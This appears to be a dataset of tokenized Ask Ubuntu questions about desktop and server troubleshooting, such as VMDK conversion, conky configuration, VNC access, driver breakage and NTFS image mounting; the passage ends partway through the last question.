4398	how do i convert a multiple-part vmdk disk image to qcow2 ?	i have a vmdk disk image that exists as multiple files : 2.0g guest-s001.vmdk 1.8g guest-s003.vmdk 128k guest-s005.vmdk 2.0g guest-s002.vmdk 1.7g guest-s004.vmdk 4.0k guest.vmdk when running qemu-img to convert it to the qcow2 format , which input filename ( s ) should i specify ? just guest.vmdk , all of them , or something like guest-*.vmdk ?
4400	how to switch between operating systems without reboot ?	is it possible to switch into a windows environment from ubuntu without rebooting the computer ?
4401	how do i use reisub with an apple slim aluminum keyboard ?	i 'm using the apple slim aluminum keyboard , which does n't have the sysrq key : what key ( s ) should i press for the magic sysrq key when i need to type reisub ?
4402	searching for anaglyph 3d games and apps	hey all , recently i installed the minecraft .jar and played it . it 's a bit of fun , but the coolest thing about it imo has been the anaglyph 3d option . yay , a viewmaster game ! anyway , i 'm looking for other anaglyph 3d games and apps . i understand that there 's an anaglyph plugin for compiz as well , although it apparently is an inactive project since 2008 . an anaglyph interface for blender would be severely awesome , right ?
4405	swap capslock and control in virtual consoles	i 'm using system > preferences > keyboard > layout > options > ctrl key position > swap ctrl and capslock , which works great for x . how can i get the same for virtual consoles ( ctrl+alt+f1 , etc . ) ?
4406	takes forever to login ?	after upgrading to 10.04 , ubuntu takes a long time ( 1-2 minutes ) to login after typing the credentials . the majority of this time the dialog box says `` checking credentials '' . how do i even go about debugging what is going on here ? this is a very snappy system , but apparently something is hanging or not responding during the login . here 's my :0-greeter.log . any ideas ? window manager warning : failed to read saved session file /var/lib/gdm/.config/metacity/sessions/1046b54d5b8b97fbb2128498129581685800000016580008.ms : failed to open file '/var/lib/gdm/.config/metacity/sessions/1046b54d5b8b97fbb2128498129581685800000016580008.ms ' : no such file or directory ** ( process:1742 ) : debug : greeter session pid=1742 display=:0.0 xauthority=/var/run/gdm/auth-for-gdm-pwdxxn/database ( gnome-power-manager:1745 ) : glib-gobject-warning ** : /build/buildd/glib2.0-2.24.1/gobject/gsignal.c:2273 : signal `proxy-status ' is invalid for instance `0x21f5160' ** ( gnome-power-manager:1745 ) : warning ** : either hal or dbus are not working ! ** ( gnome-power-manager:1745 ) : warning ** : proxy failed ** ( gnome-power-manager:1745 ) : warning ** : failed to get computer root object ** ( gnome-power-manager:1745 ) : warning ** : proxy null ! ! gdm-simple-greeter [ 1742 ] : gtk-warning : /build/buildd/gtk+2.0-2.20.1/gtk/gtkwidget.c:5636 : widget not within a gtkwindow window manager warning : buggy client sent a _net_active_window message with a timestamp of 0 for 0xe00046 ( login wind ) window manager warning : meta_window_activate called by a pager with a 0 timestamp ; the pager needs to be fixed . window manager warning : buggy client sent a _net_active_window message with a timestamp of 0 for 0xe00046 ( login wind ) window manager warning : meta_window_activate called by a pager with a 0 timestamp ; the pager needs to be fixed . ( gnome-settings-daemon:1666 ) : gdk-critical ** : gdk_window_thaw_toplevel_updates_libgtk_only : assertion `private- > update_and_descendants_freeze_count > 0 ' failed window manager warning : buggy client sent a _net_active_window message with a timestamp of 0 for 0xe00046 ( login wind ) window manager warning : meta_window_activate called by a pager with a 0 timestamp ; the pager needs to be fixed . window manager warning : currenttime used to choose focus window ; focus window may not be correct . window manager warning : got a request to focus the no_focus_window with a timestamp of 0 . this should n't happen ! ( gnome-power-manager:1745 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed
4408	what should i do when ubuntu freezes ?	all operating systems freeze sometimes , and ubuntu is no exception . what should i do to regain control when ... just one program stops responding ? nothing at all responds to mouse clicks or key presses ? the mouse stops moving entirely ? in what order should i try various solutions before deciding to pull the power plug ? what should i do when starting up ubuntu fails ? is there a diagnostic procedure i can follow ?
4410	how can i empty the trash without first opening it ?	the only way i 've seen how to empty the trash is to use the empty trash button that is displayed after choosing go | trash in nautilus . if there are too many items in the trash it can take a long time for the list of files to load , especially when nautilus defaults to generating thumbnails . is there a way to empty the trash that does n't require opening it first ?
4415	how do i know when a new beta cd is released ?	recently i downloaded and installed the ubuntu 10.10 beta cd . there was a problem with both my wired and wireless network adaptors during the installation which i 'm hoping is resolved in a later beta release . how can i determine when a later beta release is available ?
4419	empathy icon not displayed in gnome panel	when i closed the empathy messenger client , a little icon used to show up as a notification . when i got incoming chats , the icon used to start flashing . i reorganized content on my panel and now that functionality is gone ! i tried adding `` indicator-applet '' to the panel but all this does is show up an envelope which lights up when there is some activity on empathy . i want to use the empathy voice bubble icon instead . any tips appreciated . i am using ubuntu lucid lynx 10.0.4 .
4420	where do applications typically store data ?	i was wondering if there was a standard location for storing user level application data . what i mean by that is stuff like firefox bookmarks , skype message history/password , etc . i 'm asking because i am not sure if i should go with home directory encryption vs full disk encryption .
4422	how can i prevent maximized windows from overlapping conky window	i run conky in its own window of type `` panel '' . my conkyrc ( configuration # 1 ) is pasted below - this was created with the help of the conkywizard application and then tweaked to add a few additional information i needed . i use own_window_type panel as an explicit setting to avoid maximized windows from overlapping conky . however with the configuration # 1 this is not happenning . however , when i use configuration # 2 ( pasted below configuration # 1 ) then conky starts up in a panel and prevents maximized windows from overlapping it . configuration # 1 # generated with conky wizard # copyright ( c ) 2010 josã© david abad garcã­a # gpl version 3 # # warning ! all changes made in this file will be lost if the program runs again ! # default fonts use_xft yes xftfont droid sans : size=9 override_utf8_locale yes # performance settings update_interval 1.5 total_run_times 0 double_buffer yes no_buffers yes net_avg_samples 2 text_buffer_size 1024 # size and position minimum_size 210 779 gap_x 1 gap_y 21 alignment br # window settings own_window yes own_window_class conky # change this to override to make this a background window own_window_type panel own_window_transparent yes own_window_hints undecorated , below , sticky , skip_taskbar , skip_pager # window border draw_borders no draw_shades no # default color default_color e0dfde # color title . color0 dd3a21 text $ { image ~/.conkywizardtheme/pix/background.png -p 0,0 -s 256x779 } $ { goto 36 } kernel : $ { goto 120 } $ { kernel } $ { goto 36 } cpu 1 : $ { goto 120 } $ { cpubar cpu1 10,75 } $ { cpu cpu1 } % $ { goto 36 } cpu 2 : $ { goto 120 } $ { cpubar cpu2 10,75 } $ { cpu cpu2 } % $ { goto 36 } load : $ { goto 120 } $ { loadavg } $ { goto 36 } cpu graph : $ { goto 120 } $ { cpugraph -t 10,75 b7b2ad b7b2ad } $ { goto 36 } ram : $ { goto 120 } $ { membar 10,75 } $ { memperc } % $ { goto 36 } swap : $ { goto 120 } $ { swapbar 10,75 } $ { goto 36 } uptime : $ { goto 120 } $ { uptime } $ { goto 36 } $ { font droid sans : bold : size=12 } $ { color0 } disks $ { font } $ { color } $ { goto 36 } system ( / ) : $ { goto 120 } $ { fs_free / } free $ { goto 36 } $ { goto 60 } $ { fs_bar 10,100 / } $ { goto 36 } home ( /data ) : $ { goto 120 } $ { fs_free /data } free $ { goto 36 } $ { goto 60 } $ { fs_bar 10,100 /data } $ { goto 36 } $ { font droid sans : bold : size=12 } $ { color0 } network $ { font } $ { color } $ { goto 36 } upspeed : $ { goto 120 } $ { upspeedgraph wlan0 10,75 b7b2ad b7b2ad } $ { goto 36 } downspeed : $ { goto 120 } $ { downspeedgraph wlan0 10,75 b7b2ad b7b2ad } $ { goto 36 } uploaded : $ { goto 120 } $ { totalup wlan0 } $ { goto 36 } downloaded : $ { goto 120 } $ { totaldown wlan0 } $ { goto 36 } local ip : $ { goto 120 } $ { addr wlan0 } $ { goto 36 } public ip : $ { goto 120 } $ { execi 10000 ~/.conkywizardtheme/scripts/ip.sh } $ { goto 36 } $ { font droid sans : bold : size=12 } $ { color0 } temperatures $ { font } $ { color } $ { goto 36 } cpu 0 : $ { goto 120 } $ { execi 4 sensors | grep -a 0 'core 0 ' | cut -c15-18 } ºc $ { goto 36 } cpu 1 : $ { goto 120 } $ { execi 4 sensors | grep -a 0 'core 1 ' | cut -c15-18 } ºc $ { goto 36 } hard disk : $ { goto 120 } $ { execi 4 sensors | grep -a 0 'temp1 ' | cut -c15-18 } ºc $ { goto 36 } $ { font droid sans : bold : size=12 } $ { color0 } time and date $ { font } $ { color } $ { font droid sans : bold : size=9 } $ { goto 36 } $ { time % h : % m : % s } $ { time % d/ % m/ % y } $ { time [ % y % v. % w ] } $ font $ { goto 36 } $ { time % a } , $ { time % d } $ { time % b } $ { time % y } $ { goto 36 } $ { font droid sans : bold : size=12 } $ { color0 } top processes $ { font } $ { color } $ { goto 36 } top cpu users pid cpu % $ { goto 36 } $ { top name 1 } $ { top pid 1 } $ { top cpu 1 } $ { goto 36 } $ { top name 2 } $ { top pid 2 } $ { top cpu 2 } $ { goto 36 } $ { top name 3 } $ { top pid 3 } $ { top cpu 3 } $ { goto 36 } $ { top name 4 } $ { top pid 4 } $ { top cpu 4 } $ { goto 36 } $ { font droid sans : bold : size=12 } $ { color0 } at queue ( $ { execi 30 atq | wc -l } jobs ) $ { font } $ { color } $ { goto 36 } $ { execi 30 for w in `atq | cut -f1` ; do echo $ w `at -c $ w | tail -2 | fold -w35 | tail -2` ; done | sort | head -5 } configuration # 2 alignment mr background no double_buffer yes border_width 1 cpu_avg_samples 2 default_color white default_outline_color white default_shade_color white draw_borders no draw_graph_borders yes draw_outline no # amplifies text if yes draw_shades no # use xft ? use_xft yes xftfont droid sans mono : size=8 xftalpha 0.8 text_buffer_size 2048 gap_x 0 gap_y 0 minimum_size 5 5 net_avg_samples 2 no_buffers yes out_to_console no out_to_stderr no extra_newline no own_window yes own_window_class conky # change this to override to make this a background window own_window_type panel own_window_transparent yes own_window_hints undecorated , below , sticky , skip_taskbar , skip_pager stippled_borders 0 update_interval 1.5 uppercase no # set to yes if you want all text to be in uppercase use_spacer right show_graph_scale no show_graph_range no text $ { font size=10 } $ { time % b % d % k : % m : % s % y % v. % w } $ font $ sysname $ kernel $ { color orange } system $ { hr 2 } $ color $ { color grey } uptime : $ color $ uptime_short $ { freq } mhz load : $ { loadavg } temp : $ { acpitemp } $ cpubar $ { cpugraph 000000 ffffff } $ { color grey } ram usage : $ color $ mem/ $ memmax $ alignr - $ memperc % $ { color # d47d4e } $ { membar 4 } $ color $ { color grey } swap usage : $ color $ swap/ $ swapmax $ alignr - $ swapperc % $ { color red } $ { swapbar 4 } $ color $ { color grey } cpu usage : $ color $ cpu % $ { cpubar 4 } $ { color grey } processes : $ color $ processes $ { color grey } running : $ color $ running_processes $ { color orange } file systems $ { hr 2 } $ color $ { color grey } root : $ color $ { fs_free_perc / } % $ { fs_bar 6 / } $ { color grey } sda7 : $ color $ { fs_free_perc /data } % $ { fs_bar 6 /data } $ { color orange } network $ { hr 2 } $ color $ { font sans-serif : normal : size=8 } ip address : $ alignr $ { addr wlan0 } essid : $ alignr $ { wireless_essid wlan0 } connection quality : $ alignr $ { wireless_link_qual_perc wlan0 } % $ { wireless_link_bar wlan0 } $ { downspeedgraph wlan0 } dls : $ { downspeed wlan0 } /s $ alignr total : $ { totaldown wlan0 } $ { upspeedgraph wlan0 } uls : $ { upspeed wlan0 } /s $ alignr total : $ { totalup wlan0 } $ { color orange } top of the tops $ { hr 2 } $ color $ { color orange } top cpu users pid cpu % $ { color lightgrey } $ { top name 1 } $ { top pid 1 } $ { top cpu 1 } $ { color lightgrey } $ { top name 2 } $ { top pid 2 } $ { top cpu 2 } $ { color lightgrey } $ { top name 3 } $ { top pid 3 } $ { top cpu 3 } $ { color lightgrey } $ { top name 4 } $ { top pid 4 } $ { top cpu 4 } $ { color orange } top mem users pid mem % $ { color lightgrey } $ { top_mem name 1 } $ { top_mem pid 1 } $ { top_mem mem 1 } $ { color lightgrey } $ { top_mem name 2 } $ { top_mem pid 2 } $ { top_mem mem 2 } $ { color lightgrey } $ { top_mem name 3 } $ { top_mem pid 3 } $ { top_mem mem 3 } $ { color lightgrey } $ { top_mem name 4 } $ { top_mem pid 4 } $ { top_mem mem 4 } screenshot with configuration # 2 ( desired behaviour )
4428	how to create a screencast ?	how can i create a screencast on ubuntu ? the app i 'm looking for has ideally all of these features : can record in a format that can be played back easily on any platform and/or accepted by youtube or another popular video site can record just a window ( instead of the whole screen ) , possibly selecting it with a mouse click can start recording after a configurable delay ( e.g. , i launch the app and have time to do arrangements to my desktop/window before actual recording starts )
4434	what does `` .local '' do ?	i 've got several ubuntu machines on my network at home , but the dns is provided by a windows server ( 2k ) . when i ssh to them from another , if i ssh to them as `` machine '' i ca n't connect , but if i connect as `` machine.local '' i can connect . i think similarly , i ca n't connect from a windows client ( like putty ) . what 's going on here ? - it 's clearly an ubuntu thing .
4443	how do i use ffmpeg 's `` -vf '' / `` -vfilters '' option without recompiling ffmpeg myself ?	i have ffmpeg install from apt ( version 4:0.5.1-1ubuntu1 ) . i have a video that is up-side-down , so i want to flip it vertically . the ffmpeg documentation says to use the -vf option ( which i see was recently renamed from -vfilters ) . however that just does n't work for me . i get an error like : ffmpeg : unrecognized option '-vf ' . i know there are all kinds of legal reasons why ffmpeg is not the full options , but surely flipping a video should be ok ? there are many guides for ubuntu and ffmpeg which advise to recompile it yourself . e.g . the number 2 hit for `` ubuntu ffmpeg '' is a guide on ubuntu forums on recompiling ffmpeg yourself . i do n't want to recompile it myself . i am a fan of package managers and `` doing things the right way '' . there should be a way to get this functionality in the packaged version , otherwise there is a bug in the packaged version . how can i get the -vf/-vfilter option in ffmpeg ? ( if i ca n't get it , why not ? )
4444	pgadmin3 : unable to initialize gtk , is display set properly ?	i 'm having some trouble getting pgadmin3 to run on a remote server . i 'm logging in to the server using ssh with the -x option . when i first installed pgadmin3 , i was able to launch it using the command `` pgadmin3 & '' , and pg admin would launch correctly using my local x server . something has happened though , and now pg admin will no longer launch . it bounces back with the message `` error : unable to initialize gtk , is display set properly ? '' i 'm using the same ssh command to log in to the server , and the same command to launch pg admin , yet it is no longer working . i have n't made any changes to my ssh configuration , nor have i installed any new software , so i 'm at a loss as to how this broke and how to go about fixing it . what could have happened to break this , and where do i start with fixing it ?
4447	what is the `` floppy0 '' icon in computer ?	my thinkpad x60 does n't have a floppy drive . what is this `` floppy0 '' icon for ? ak @ myo5a : ~ $ ls -l /media/ total 8 lrwxrwxrwx 1 root root 7 2010-04-29 13:05 floppy - > floppy0 drwxr-xr-x 2 root root 4096 2010-04-29 13:05 floppy0 drwxr-xr-x 2 root root 4096 2010-05-12 10:33 iso ak @ myo5a : ~ $ ls /dev/scd* ls : can not access /dev/scd* : no such file or directory ak @ myo5a : ~ $ egrep -rs `` floppy|scd '' /var/log ak @ myo5a : ~ $ i am not looking for a way to just make this icon go away . i want to understand why it is here .
4448	patch for new 64bit kernel vulnerability ?	i read about the 64 bit kernel vulnerability in the linux kernel today ( 9/20 ) link to article i have an ubuntu server 10.04 and 8.04 in my organization . my question is could i just use the apt-get utility or the aptitude safe-upgrade to patch these kernels - but is the 64 bit kernel patch included in those updates i would download ?
4452	ubuntu as guest os ( with vista host ) stuck at 800x600 resolution	i believe i 've successfully got ubuntu 10.04 installed as the guest os with vista as host on my laptop . but i have been unable to get it to use the entire monitor . in ubuntu and using the system- > monitor preferences , i have one monitor `` unknown '' with a resolution of 800x600 and have n't found out how to change it to use the full 1920x1200 of my laptop . i 'm using oracle 's vm virtualbox . i am new to ubuntu ( and *nix in general ) , so i could be missing something easy .
4454	how does /etc/default/console-setup work ?	following up on modifying virtual consoles ' keymaps , how can i edit /etc/default/console-setup ? will the file be parsed on each boot ( then cached in /etc/console-setup/cached.kmap.gz ) , or do i need to run a certain command after every manual change ? the description for package console-setup does give its basic purpose , but am i missing documentation on how to use it ?
4467	best vnc client for remote desktop assistance ?	poll on best vnc / remote desktop software for assisting others on windows/mac machines from ubuntu ? i 've heard good things about teamviewer and fog creek copilot , but i 'm wondering if the included gnome vinaigre vnc client is good enough for this . to specify , i 'm looking for best option based on : simplest ease-of-use for client to download/use on their end . see # 1 . works cross-platform i am able to control client 's mouse and/or keyboard from remote machine .
4473	numeric keypad not working	i am running ubuntu 10.04 , fully updated , from an external usb hard drive . everything works really well , except the keyboard . the numeric keypad is not working . the keys do n't do anything , with or without numlock on . the keyboard preferences are set for generic 105-key ( intl ) pc . the keyboard itself , on this computer , is ps2 . any ideas where to look for trying to fix this ?
4474	enable remote vnc from the commandline ?	i have one computer running ubuntu 10.04 , and is running vino , the default vnc server . i have a second windows box which is running a vnc client , but does not have any x11 capabilities . i am ssh 'd into the ubuntu host from the windows host , but i forgot to enable vnc access on the ubuntu host . on the ubuntu host , is there a way for me to enable vnc connections from the ubuntu commandline ? update : as @ koanhead says below , there is no man page for vino ( e.g . man -k vino and info vino return nothing ) , and vino -- help does n't show any help ) .
4476	should i use spawn-fcgi or dotdebs php5-fpm ?	i am setting up an ubuntu server with nginx , php and mysql . i have found two options for fast-cgi php . firstly i can use the spawn-fcgi package and make some startup scripts , similar as done here the second option is to use the dotdeb packages and use php5-fpm ( installation instructions ) which one shall i choose ? are there any difference in processor usage ?
4477	how do i find packages to install via apt-get	after doing a man apt-get and cursory google search it 's not clear how i find new programs to install ( from the internet ) using apt-get ( which is amazingly powerful and simple coming from another linux distro ) . i 'm using ubuntu server 8.04 lts ( an inherited system used for some random work ) , so no gui . anyone have quick advice here ?
4485	how can i set a launcher to start an application in a specific desktop	i 've got a bunch of desktops set up for specific purposes . i 'd really like to be able to tell an app what desktop it should launch in . i ca n't find any options for that , is there any way to do it ?
4486	mixxx will not recognize all inputs and outputs on ni audio 4dj soundcard	i ca n't seem to select the two different inputs ( 4 channels ) and two outputs ( 4 channels ) on this soundcard . ubuntu/mixxx only seems to recognize one input ( 2 channels ) and every time i select the one available mixxx says it ca n't connect . any help would be greatly appreciated i feel this is a problem with either pulse audio or alsa not mapping all the channels
4487	unauthenticated software sources	my lucid ( 10.04 ) installation recently started warning me that the updated packages were unauthenticated . for instance , if i open update manager and click the `` install updates '' button , it warns me that you are about to install software that ca n't be authenticated ! doing this could allow a malicious individual to damage or take control of your system . i do n't remember seeing this before . i guess it looks like i do n't have the right keys to verify signatures . update with more information : i get the warning for all packages , including apt and linux-image . this is what 's in my /etc/apt/sources.list ( sans comments ) deb http : //us.archive.ubuntu.com/ubuntu/ lucid main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ lucid main restricted deb http : //us.archive.ubuntu.com/ubuntu/ lucid-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ lucid-updates main restricted deb http : //us.archive.ubuntu.com/ubuntu/ lucid universe deb-src http : //us.archive.ubuntu.com/ubuntu/ lucid universe deb http : //us.archive.ubuntu.com/ubuntu/ lucid-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ lucid-updates universe deb http : //us.archive.ubuntu.com/ubuntu/ lucid multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ lucid multiverse deb http : //us.archive.ubuntu.com/ubuntu/ lucid-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ lucid-updates multiverse deb http : //us.archive.ubuntu.com/ubuntu/ lucid-security main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ lucid-security main restricted deb http : //us.archive.ubuntu.com/ubuntu/ lucid-security universe deb-src http : //us.archive.ubuntu.com/ubuntu/ lucid-security universe deb http : //us.archive.ubuntu.com/ubuntu/ lucid-security multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ lucid-security multiverse update 2 : whatever it was that was wrong , it is no longer wrong , so i wo n't be able to verify any suggested solutions .
4489	who pays for ubuntu ?	ubuntu seems expensive to develop and maintain . bandwidth , development , marketing , and maintenance all cost money , and since ubuntu is free to download and use , i do n't see who pays for it all . i ask because i 'm a happy ubuntu user since 2006 and wonder how sustainable the project is .
4497	workspace specific wallpapers with compiz ?	is it possible to get a different wallpaper for each workspace using compiz ? i 've found a tutorial telling me to find the wallpaper option in compizconfig , but it was n't there .
4498	what is the best desktop search tool ?	beagle was my favorite . but it is not maintained anymore , afaik . and it does not work reasonably ; it stops working spontaneously and does not return any result . how can i correct this problem and if it is not possible what alternatives are available ? thank you .
4499	how can i diagnose/debug `` maximum number of clients reached '' x errors ?	i 'm hitting a problem whereby x prevents processes from creating windows , uttering something like the following into ~/.xsession-errors : can not open display : :0.0 maximum number of clients reached searching around there are lots of examples of people facing this problem , and sometimes people identify which program they are running is using up all the client slots . see e.g . lp 70872 ( firefox ) , lp 263211 ( gnome-screensaver ) . for what it 's worth , i run gnome-terminal , thunderbird , chromium-browser , empathy , tomboy and virtualbox nearly all the time , on top of the normal stuff you get with the gnome desktop , and occasionally some other bits and pieces . however my question is not `` which of my programs is causing this problem '' but rather , how can one go about diagnosing this problem ? in the above ( and other ) bugs , forum reports , etc. , a number of tools are suggested : xlsclients - lists the client applications for the given display , but i do n't think that corresponds to 'x clients' xrestop - a top-style x resources tool , one row per x client . lots of '' clients , not shown in xlsclients output xwininfo -root -children lists x window objects from what i can gather , the problem might not be too many clients at all , but rather resources kept around in the x server for clients who have long-since detached . but it would also appear that you can not ( easily ? ) relate x resources back to their client . can one effectively diagnose this issue once it has started to occur , or is a tedious divide-and-conquer approach for the apps i run the only approach open to me ? update jan 2011 : i think i have resolved this issue . for the benefit of anyone stumbling across this , nautilus and/or compiz or something in that chain of software was segfaulting due to a wallpaper i had . i had chosen an xml file as my wallpaper , which defined a rotating gallery of images . it was hand-made , but based on /usr/share/backgrounds/contest/background-1.xml or similar . disabling the wallpaper and i have not had a crash since . i 'm not marking this as answered yet , since the actual specific problem was not my question , but how to diagnose it was . unfortunately this was mostly trial-and-error which sucks .
4502	how can i find out why a package was installed ?	how can i find out why a particular package was installed ? is it part of the default installation ? was it specified manually , or was it chosen automatically to meet dependencies ? which packages are dependent on it ? when was it installed ?
4507	how do i disable middle mouse button click paste ?	is there a way to disable the middle mouse button paste behavior that is here by default on gnome ? i have a sensitive mouse wheel and whenever i scroll texts , sometimes it pastes stuff randomly into the text . i lose quite a lot of credibility when i send a file to someone else that has random text snippets pasted all over it . i have seen a solution that goes by mapping the mouse 's middle button to a non-existant mouse button , but that implies getting rid of the middle mouse button altogether ( i.e . no tab-closing , opening links into a new tab automatically , etc. ) . i 'd like to keep my middle mouse button active , just disable the pasting behavior . this also happens when i scroll text with my touchpad ( accidentally hit two-fingers without moving , bam . ) so the problem will not be fixed just by changing for a new mouse ( in fact i believe it happens more often with my touchpad than with my mouse ) .
4508	how do i safely use a virus infected usb drive in ubuntu ?	i have an usb drive which i know is virus infected ( an anti-virus on my friend 's machine detected it ) . unfortunately neither of us know the virus name and i do n't want to take the risk of plugging it to my windows box again . of course , in all probability the virus affects only windows . ( but i 'm not sure ) i want to know if i can safely plug the usb into my ubuntu lucid laptop and copy the stuff i need from the drive . if there are some precautions i need to follow what would they be ?
4526	i managed to break my ati drivers , what should i do ?	somehow , i managed to break my ati drivers by trying to install a new driver from amd 's website . i tried uninstalling ( amdcccle , fglrx and pretty much everything that seemed related to ati in synaptic ) / reinstalling many times but i keep getting crashes and my hardware drivers utility does n't even detect the presence of my ati card anymore . is there any way to repair my ati drivers or will i have to reinstall ubuntu ? i 've already spent many hours on this and i 'm starting to believe reinstalling will be the easiest .
4527	how do i find out the name of the font used to display some specific text on the screen ?	i want something that runs on my computer that somehow interrogates x and tells me exactly the font , not a guess .
4529	movie player totem shuts down without any error message	i 'm using ubuntu 10.04 and have an issue with movie player totem . recently i got a great movie . for those who know `` wall street '' 1987 . so i was watching it and for no reason totem shut himself down . did any of you have such issue ? is there any solution for that ? upd : when i execute totem from command line as root it gives me such message : ( totem:2986 ) : totem-warning ** : failed to create dbus proxy for org.gnome.settingsdaemon : could not get owner of name 'org.gnome.settingsdaemon ' : no such name but will i start it as root or just as user does n't matter it shuts down without any error message in terminal .
4530	add some default text to ctrl-alt-f1 console to remind myself how to reboot properly	i do know there are questions and good answers , what to do if ubuntu just hangs ( like this one : http : //ubuntu.stackexchange.com/questions/4408/what-should-i-do-when-ubuntu-freezes ) . my problem is that such a hang occurs so seldom for me , that i do n't remember most of the answers at that time and i have no second machine to ask the internet while my main system hangs . i always remember how to open the console using some ctrl-alt-fx combination . so is there a possibility to have some lines of `` intro text '' in that console , which tell me directly after switching to the console how to kill hanging processes and how to properly reboot ? think of it as a `` reminder to self '' . dos had the ability to change the prompt in a console to arbitrary output . maybe something similar can be done here to get me remember at least the basics ?
4535	turn off compiz effects for one specific window ?	is there a way to disable compiz effects for just one window type or application ? i use the alt + mouse click shortcut to move windows and i like it , but when i use inkscape i can not use any options of the application that use alt because compiz immediately grabs the alt and puts me in window movement mode . i think this is a bad design , applications should be able to override this behavior if they need to ... . anyways is there a way to do it ? thanks .
4538	what version of evolution will be in maverick ?	i 've tried evolution 2.30.3 from jacob 's ppa on lucid and the version of 2.30.3 in maverick beta , they differ and both have significant shortcomings . you ca n't right click on an email and create a meeting , event or task , for example . some settings do n't work in the maverick version -- ( un ) compress weekends in month view , for example . no alarms for events just adds to its woes . if evo is not working reliably in maverick , i 'll stick with 2.28.3 in lucid .
4546	how do i turn off pci devices ?	with the purchase of an intel ssd and 85whr li-ion battery and the linking of wifi and bluetooth to my laptop 's wireless switch , extensive intel powertop usage , switching from compiz to metacity , stopping of the desktop-couch daemon , removal of ubuntu one and several other services from my startup , disabling of everything possible in my bios , and physical removal of my optical drive , i 've gotten my battery life up fairly high , but i think there 's still more to be done . specifically , when i 'm in class taking notes , i want to temporarily but completely power down : ethernet firewire usb ports sd card reader optical drive webcam sound card pcmcia slot ..without turning them off in my bios like they are now , if possible , because then i have to restart my computer to use any of them . as it stands , i still have n't managed to power down : firewire usb connection to webcam sound card how do i tell linux to disable and power down these devices ? is it true that any pci slot can be physically powered down ? my current idle power consumption is 7.9 watts plus the screen . ( 10.0w at min . brightness ) also , how do i set the screen timeout to ten seconds ? gconf editor is n't honoring it when i set it to that . will switching from nvidia to nouveau save any significant amount of power ?
4550	java and alsa problems	i 'm trying to use a java-based application that requires sound in ubuntu 10.04 using sun-java from partner repos . however , the sound is way too fast . it seems like a chipmunk got into my speakers . : ) is this happening to anyone else ? any ideas on how to fix it ?
4552	how to show the new style notifications ?	installed ubuntu on my friends laptop . notifications are showing in the old style , the stock gnome support . notify-osd is installed . any help ?
4555	what 's the best way to store a passphrase ?	i 've recently enabled ubuntu 's encrypted /home/ directory features and i was asked to remember a passphrase in case i would need to recover the data manually . what is the best way to store this passphrase without compromising security ?
4559	pptp vpn on non-standard port	how can i run a vpn connection on a non-standard port ? i have set up a vpn on my router running dd-wrt which i connected to my main router . i have forwarded the port to port 90 and can not connect to the vpn with the network manager . if i change the port back to 1723 ( the default port ) i can connect just fine . does anybody know how to fix this ? here are the relevant ip addresses : 1.1.1.1=dd-wrt router 192.168.1.154=ip on internet router 64.7.134.78=ip i want it to work like this : 1.1.1.1:1723 > 192.168.1.154:1723 > 64.7.134.78:90 but it will only work like this : 1.1.1.1:1723 > 192.168.1.154:1723 > 64.7.134.78:1723
4561	what should i do when i see blank screen ?	i was installing an application using ubuntu software center and screen went blank i waited a while but nothing appearing no desktop so pretty much expected result is that i rebooted manually please correct this or tell me what should i do , iam not running any screensavers nor does the virtual console work
4564	how do i install my microphone ?	my microphone does n't work in ubuntu . i have a dell studio xps 16 laptop . what are the steps to install microphone support ?
4571	pros and cons of hibernating	i 've recently started to systematically hibernate my laptop instead of shutting it down . the main reason i chose to do this is that i use one of my workspace as a highly customized dashboard . it 's a bunch of windows spatially arranged in a specific way . of course , i could do a bunch of startup scripts to get the same effect , but it would take long to do and be difficult to manage . another reason is that one of my workspaces is a virtualized windows os which takes some time to load . are there any drawbacks to systematically hibernating instead of powering down ? all i can think of is potential memory leaks , but it does n't seem to be a problem so far .
4572	how can i cache nfs shares on a local disk ?	i use nfs to share media to computers around my house . unfortunately one of the machines is on a slow wireless link , is there a way to cache network shares on the local disk for performance ?
4575	how do i use and configure terminal colours ?	my terminal is all black and white . : p no colours . terminal output is highlighted by different colours to represent data . like if we do ls , folder and files have separate colour but my terminal shows only one colour . i 'm on ubuntu 10.10 using gnome-terminal
4577	a partitioning scheme for ubuntu server	i am setting up an ubuntu server to be used for experimentation , testing and learning . basically with lamp and then setting up wordpress and most likely drupal . i also plan to experiment with setting up a home intranet . this system will not be serving over the internet . my desktop has a fairly standard / , swap , /home partitioning scheme . would this be an adequate scheme for the server as well ? or would it be beneficial to do something fancy like creating separate partitions for /usr , /var , /tmp , and /home ? i 'll probably wind up doing things like corrupting mysql and having to start over while on my learning curve . also , i have 2 drives and plan on setting up with software raid0 if that matters . thanks .
4581	computer hangs even before grub is reached	last night i was trying to make it so my ipod touch would interface with my kubuntu machine , and somehow i ended up doing something very , very wrong . now , whenever the computer starts up , before grub even loads , i get a few strange error messages : [ drm ] nouveau - could n't find matching output script table . gpu lockup ( those are n't the exact errors , i had to shorthand transcribe the gist ) . not only do those errors ( and others that are mostly identical ) occur , but part of the way through the boot process my screen turns to this ( and is afterward useless until the power is hard-reset : / ) : does anybody have any idea as to what i did ? i 've been trying all day to get anything working using a xubuntu livecd , but to no avail . i even erased all of my data trying to perform a clean install from the disc .
4584	ntfs backup image wont mount	i made an image of my ntfs partition before i formatted , but now it wont mount . i 'm pretty sure i 've mounted this image before . root @ z : /var/backup # mkdir storage-disk root @ z : /var/backup # mount storage-disk.img storage-disk ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read vcn 0x2 : input/output error failed to mount '/var/backup/storage-disk.img ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . i 've tried running ntfsfix on the image , but no dice . root @ z : /var/backup # ntfsfix storage-disk.img mounting volume ... pread : input/output error failed to calculate number of free mfts : input/output error . failed attempting to correct errors ... processing $ mft and $ mftmirr ... reading $ mft ... ok reading $ mftmirr ... ok comparing $ mftmirr to $ mft ... ok processing of $ mft and $ mftmirr completed 